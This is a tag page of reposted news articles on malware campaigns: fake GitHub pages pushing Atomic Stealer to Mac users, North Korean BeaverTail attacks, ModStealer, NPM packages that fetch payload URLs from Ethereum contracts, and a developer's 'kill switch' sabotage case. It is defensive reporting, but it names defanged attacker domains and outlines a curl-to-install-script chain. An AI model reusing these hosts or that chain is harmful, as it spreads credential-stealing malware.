Tag:

malware

A hacker in a Guy Fawkes mask using an Apple MacBook.
Gaming Gear

Fraudulent GitHub Pages impersonate trusted companies to trick Mac users into installing malware, leaving financial and personal data at risk

by admin



  • Atomic Stealer malware installs silently via fake GitHub Pages targeting Mac users
  • Attackers create multiple GitHub accounts to bypass platform takedowns repeatedly
  • Users copying commands from unverified websites risk serious system compromise

Cybersecurity researchers are warning Apple Mac users about a campaign using fraudulent GitHub repositories to spread malware and infostealers.

Research from LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts found attackers are impersonating well-known companies to convince people to download fake Mac software.

Two fraudulent GitHub pages pretending to offer LastPass for Mac were first spotted on September 16 2025 under the username “modhopmduck476.”


You may like

How the attack chain works

While these particular pages have been taken down, the incident suggests a broader pattern that continues to evolve.

The fake GitHub pages included links labeled “Install LastPass on MacBook,” which redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass.

From there, users were sent to macprograms-pro[.]com/mac-git-2-download.html and told to paste a command into their Mac’s terminal.

That command used a CURL request to fetch a base64-encoded URL that decoded to bonoud[.]com/get3/install.sh.

The script then delivered an “Update” payload that installed Atomic Stealer (AMOS malware) into the Temp directory.

Atomic Stealer, which has been active since April 2023, is a known infostealer used by financially motivated cybercrime groups.

Investigators have linked this campaign to many other fake repositories impersonating companies ranging from financial institutions to productivity apps.


You may like

The list of targeted names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp, and numerous others.

Attackers appear to create multiple GitHub usernames to bypass takedowns, using Search Engine Optimization to push their malicious links higher on search results in Google and Bing.

This technique increases the chances that Mac users searching for legitimate downloads will encounter the fraudulent pages first.

LastPass states it is “actively monitoring this campaign” while working on takedowns and sharing indicators of compromise to help others detect threats.

The attackers’ use of GitHub Pages reveals both the convenience and the risks of community platforms.

Fraudulent repositories can be set up quickly, and while GitHub can remove them, attackers often return under new aliases.

This cycle raises questions about how effectively such platforms can protect users.

How to stay safe

  • Only download software from verified sources to avoid malware and ransomware risks.
  • Avoid copying commands from unfamiliar websites to prevent unauthorized code execution.
  • Keep macOS and all installed software up to date to reduce vulnerabilities.
  • Use the best antivirus or security software that includes ransomware protection to block threats.
  • Enable regular system backups to recover files if ransomware or malware strikes.
  • Stay skeptical of unexpected links, emails, and pop-ups to minimize exposure.
  • Monitor official advisories from trusted vendors for timely security updates and guidance.
  • Configure strong, unique passwords and enable two-factor authentication for important accounts.

You might also like



Source link

0 comments
0 FacebookTwitterPinterestEmail
North Korean Hackers Hit Crypto Sector With BeaverTail Malware
Crypto Trends

North Korean Hackers Hit Crypto Sector With BeaverTail Malware

by admin


  • How it works 
  • Growing threat 

According to a recent report by The Hacker News, North Korean hackers are attempting to trick non-developer job applicants within the cryptocurrency sector with the BeaverTail malware, which steals logins and crypto wallets, and InvisibleFerret. 

Both macOS and Windows users should avoid strange downloads from GitHub or Vercel as well as suspicious scripts.  

How it works 

Unfortunate applicants who fall for the sham run “fix” commands that disguise bogus microphone or camera errors when recording a short video on a fake website created by the attackers. This is a common trick used by North Koreans, which should be automatically treated as a red flag. 

With the help of the aforementioned commands, the attackers then run a payload that installs BeaverTail and InvisibleFerret as a bundle. 

What is notable is that North Korean attackers used to target primarily tech-savvy developers with BeaverTail, but they have now changed their targets. The new version is a ready-to-run program, meaning that it is no longer necessary for JavaScript or Python to be installed on the victim’s machines.  

You Might Also Like

The usage of harmless-looking decoy files also makes it more challenging for security tools to actually detect them. Some parts of the malware are also hidden in password-protected files. 

Growing threat 

The recent malware has been linked to North Korean attackers since BeaverTail was previously used by them. Moreover, some IPs are associated with the hermit kingdom. 

As reported by U.Today, Binance CEO Changpeng Zhao recently took to X (formerly Twitter) to warn about North Korean hackers posing as job candidates, potential employers, and users. 



Source link

0 comments
0 FacebookTwitterPinterestEmail
Crypto Users Face Danger From New Modstealer Malware
GameFi Guides

Crypto Users Face Danger from New ModStealer Malware

by admin



While the crypto industry is going through various security breaches, ModStealer, a new infostealer malware, is targeting crypto users on macOS, Windows, and Linux systems. Experts note that this malware can steal information on crypto wallets and access credentials of users. 

According to information from 9to5mac, Apple-focused security company Mosyle found the malware, which even major antivirus engines failed to catch for almost a month after it was uploaded to VirusTotal, an online service that checks files for harmful content.

The report cites that the ModStealer is being delivered to victims through malicious job postings, specifically targeting developers. Using heavily obfuscated JavaScript files written with NodeJS, the malware remains completely undetectable by signature-based defenses. 

“The malware’s main goal is data exfiltration, with a particular focus on cryptocurrency wallets, credential files, configuration details, and certificates,” Mosyle said. The security researchers also found targeting logic for different wallets, such as extensions for Safari and Chromium-based browsers. 

Malware’s perplexing infrastructure

The security company said that the malware stays on macOS by using the system to register as a background agent. While its server seems hosted in Finland, it is believed that the infrastructure is routed through Germany to hide where the operators are from.

“For security professionals, developers, and end users alike, this serves as a stark reminder that signature-based protections alone are not enough. Continuous monitoring, behavior-based defenses, and awareness of emerging threats are essential to stay ahead of adversaries,” Mosyle warns.

On macOS, the malware stays on a victim’s Mac for a long time and is hard to find by using Apple’s own launchctl tool to install itself as a LaunchAgent. From there, it watches what people do and sends sensitive data to a server far away.

Mosyle thinks that the ModStealer fits the description of Malware-as-a-Service (MaaS). This is where people who make malware make and sell harmful packages to affiliates. This kind of business model has become more and more popular among cybercriminal gangs, especially when it comes to spreading infostealers. 

Rise in Crypto Related Hacks 

Crypto hacks have been on the rise for the past few months. PeckShield, a blockchain security firm, says that the hackers stole over $142 million in 17 attacks last month. The amount is 27.2% higher than that of $111.6 million in June 2025.

Also Read: Radiant Hacker Moves $26.7 Million in Stolen Funds to Ethereum



Source link

0 comments
0 FacebookTwitterPinterestEmail
Decrypt logo
GameFi Guides

Researchers Uncover Undetectable Malware Draining Crypto Browser Wallets

by admin



In brief

  • ModStealer spreads through fake recruiter ads using obfuscated code.
  • It targets browser wallets and hides by disguising itself as a background helper.
  • The malware poses a direct threat to crypto users and platforms, Decrypt was told.

A new malware strain that can slip past antivirus checks and steal data from crypto wallets on Windows, Linux, and macOS systems was discovered on Thursday.

Dubbed ModStealer, it had remained undetected by major antivirus engines for almost a month at the time of disclosure, with its package being delivered through fake job recruiter ads targeting developers. 

The disclosure was made by security firm Mosyle, according to an initial report from 9to5Mac. Decrypt has reached out to Mosyle to learn more.



Distributing through fake job recruiter ads was an intentional tactic, according to Mosyle, because it was designed to reach developers who were likely already using or had Node.js environments installed.

ModStealer “evades detection by mainstream antivirus solutions and poses significant risks to the broader digital asset ecosystem,” Shān Zhang, chief information security officer at blockchain security firm Slowmist, told Decrypt. “Unlike traditional stealers, ModStealer stands out for its multi-platform support and stealthy ‘zero-detection’ execution chain.”

Once executed, the malware scans for browser-based crypto wallet extensions, system credentials, and digital certificates. 

It then “exfiltrates the data to remote C2 servers,” Zhang explained. A C2, or “Command and Control” server, is a centralized system used by cybercriminals to manage and control compromised devices in a network, acting as the operational hub for malware and cyberattacks.

On Apple hardware running macOS, the malware sets itself up through a “persistence method” to run automatically every time the computer starts by disguising itself as a background helper program. 

The setup keeps it running quietly without the user noticing. Signs of infection include a secret file called “.sysupdater.dat” and connections to a suspicious server, per the disclosure.

“Although common in isolation, these persistence methods combined with strong obfuscation make ModStealer resilient against signature-based security tools,” Zhang said.

The discovery of ModStealer comes on the heels of a related warning from Ledger CTO Charles Guillemet, who disclosed Tuesday that attackers had compromised an NPM developer account and attempted to spread malicious code that could silently replace crypto wallet addresses during transactions, putting funds at risk across multiple blockchains.

Although the attack was detected early and failed, Guillemet later noted that the compromised packages had been hooked to Ethereum, Solana, and other chains.

“If your funds sit in a software wallet or on an exchange, you’re one code execution away from losing everything.” Guillemet tweeted hours after his initial warning.

Asked about the new malware’s possible impact, Zhang warned that ModStealer poses a “direct threat to crypto users and platforms.”

For end-users, “private keys, seed phrases, and exchange API keys may be compromised, resulting in direct asset loss,” Zhang said, adding that for the crypto industry, “mass theft of browser extension wallet data could trigger large-scale on-chain exploits, eroding trust and amplifying supply chain risks.”

Daily Debrief Newsletter

Start every day with the top news stories right now, plus original features, a podcast, videos and more.



Source link

0 comments
0 FacebookTwitterPinterestEmail
Ethereum Devs Targeted By Malware Hidden In Smart Contracts
GameFi Guides

Ethereum Devs Targeted by Malware Hidden in Smart Contracts

by admin



Hackers have found a new method to hide malicious software, commands, and links within Ethereum smart contracts to avoid detection by security scans, as attacks targeting code repositories become more advanced. 

ReversingLabs cybersecurity researchers have discovered two fake JavaScript packages, named “colortoolsv2” and “mimelib2,” in the Node Package Manager (NPM). 

These packages, added in July, trick security systems by hiding their malicious instructions inside Ethereum smart contracts. In a blog post published on Wednesday, ReversingLabs researcher Lucija Valentić revealed that these packages function as downloaders, extracting command and control server addresses from Ethereum blockchain smart contracts. 

Once installed, the packages query the blockchain to fetch URLs for downloading second-stage malware, which delivers the malicious payload. This approach makes detection challenging, as blockchain traffic appears legitimate, masking the malicious activity. 

Hackers are using Ethereum Smart Contracts in a new tactic

Hackers, including the North Korean-linked Lazarus Group, have used Ethereum smart contracts before to spread harmful software, or malware. However, ReversingLabs researcher Lucija Valentić has explained that this new tactic is different. 

Now, hackers are hiding web addresses (URLs) inside Ethereum smart contracts. These URLs direct victims to download harmful software onto their devices. The attack is a new trick that hasn’t been seen before, and it’s harder for security systems to catch because it uses the blockchain in a sneaky way. 

Valentić says the incident shows how quickly hackers are finding new ways to avoid detection while targeting developers and open-source code platforms. This malware is part of a larger scam on GitHub, where hackers create fraudulent projects for cryptocurrency trading bots. 

To make these projects look real, they add fake updates, create fake user accounts, use multiple fake maintainers, and include professional-looking descriptions. The misleading information tricks developers into trusting and downloading the malicious software. 

In 2024, security experts found 23 scams involving cryptocurrencies on open-source code platforms, where hackers hid malicious software. According to Valentić, this new type of attack reveals that the scams are becoming more sophisticated. 

Further, in April, hackers created a fake GitHub project pretending to be a Solana trading bot, which secretly installed malware to steal cryptocurrency wallet information. They also targeted “Bitcoinlib,” a tool that helps developers work with Bitcoin, showing how hackers are attacking different platforms to steal from users.

Also Read: World Liberty Financial Blocks Hacking Attempts on Token Launch



Source link

0 comments
0 FacebookTwitterPinterestEmail
(CoinDesk Data)
NFT Gaming

Attackers Are Now Using Ether Smart Contracts to Mask Malware

by admin



Ethereum has become the latest front for software supply chain attacks.

Researchers at ReversingLabs earlier this week uncovered two malicious NPM packages that used Ethereum smart contracts to conceal harmful code, allowing the malware to bypass traditional security checks.

NPM is a package manager for the runtime environment Node.js and is considered the world’s largest software registry, where developers can access and share code that contributes to millions of software programs.

The packages, “colortoolsv2” and “mimelib2,” were uploaded to the widely used Node Package Manager repository in July. They appeared to be simple utilities at first glance, but in practice, they tapped Ethereum’s blockchain to fetch hidden URLs that directed compromised systems to download second-stage malware.

By embedding these commands within a smart contract, attackers disguised their activity as legitimate blockchain traffic, making detection more difficult.

“This is something we haven’t seen previously,” ReversingLabs researcher Lucija Valentić said in their report. “It highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open source repositories and developers.”

The technique builds on an old playbook. Past attacks have used trusted services like GitHub Gists, Google Drive, or OneDrive to host malicious links. By leveraging Ethereum smart contracts instead, attackers added a crypto-flavored twist to an already dangerous supply chain tactic.

The incident is part of a broader campaign. ReversingLabs discovered the packages tied to fake GitHub repositories that posed as cryptocurrency trading bots. These repos were padded with fabricated commits, bogus user accounts, and inflated star counts to look legitimate.

Developers who pulled the code risked importing malware without being aware of it.

Supply chain risks in open-source crypto tooling are not new. Last year, researchers flagged more than 20 malicious campaigns targeting developers through repositories such as npm and PyPI.

Many were aimed at stealing wallet credentials or installing crypto miners. But the use of Ethereum smart contracts as a delivery mechanism shows adversaries are adapting quickly to blend into blockchain ecosystems.

A takeaway for developers is that popular commits or active maintainers can be faked, and even seemingly innocuous packages may carry hidden payloads.



Source link

0 comments
0 FacebookTwitterPinterestEmail
Hacker
Product Reviews

Disgruntled coder who admitted to deploying a malware ‘kill switch’ to get back at his bosses sentenced to 4 years in prison

by admin



After a total wait even longer than his prison sentence and being convicted in March, former software developer Davis Lu has finally been sentenced for a malware kill switch scheme he deployed in 2019.

Lu will have to serve four years in prison followed by three years of supervised release. It’s the end to a long saga that began with a frustration many are all too familiar with: a demotion. In 2018, the company Lu worked for as a senior software developer, Eaton Corporation, went through a corporate realignment.

As a result, Lu was demoted. He stayed at the company until September 9, 2019, when he was finally put on leave and asked to return his company laptop. Lu had apparently been planning for this. When he was demoted, he “began sabotaging his employer’s systems,” according to the Department of Justice.


Related articles

Lu’s havoc on his former employer included malicious code that sparked system crashes, blocked logins, deleted files, and ultimately ended with a “kill switch” that, according to the DoJ, locked out all users if Lu’s credentials were ever disabled. Lu even named the kill switch “IsDLEnabledinAD,” short for “Is Davis Lu enabled in Active Directory.”

When Lu was put on leave, that kill switch automatically triggered. The kill switch and Lu’s other malicious code resulted in “hundreds of thousands of dollars in losses” for his former employer. Now, it has also resulted in jail time for Lu, who was convicted in March. That conviction is not surprising since he straight up admitted to sabotaging his former employer all the way in October 2019.

However, Lu didn’t plead guilty and even reportedly designed his malicious code to make it look like it was coming from co-workers who took over his duties. Lu also deleted encrypted data from his company laptop before handing it over. But that clearly wasn’t enough to stop the FBI from tying the cyber sabotage back to Lu.



Source link

0 comments
0 FacebookTwitterPinterestEmail
Close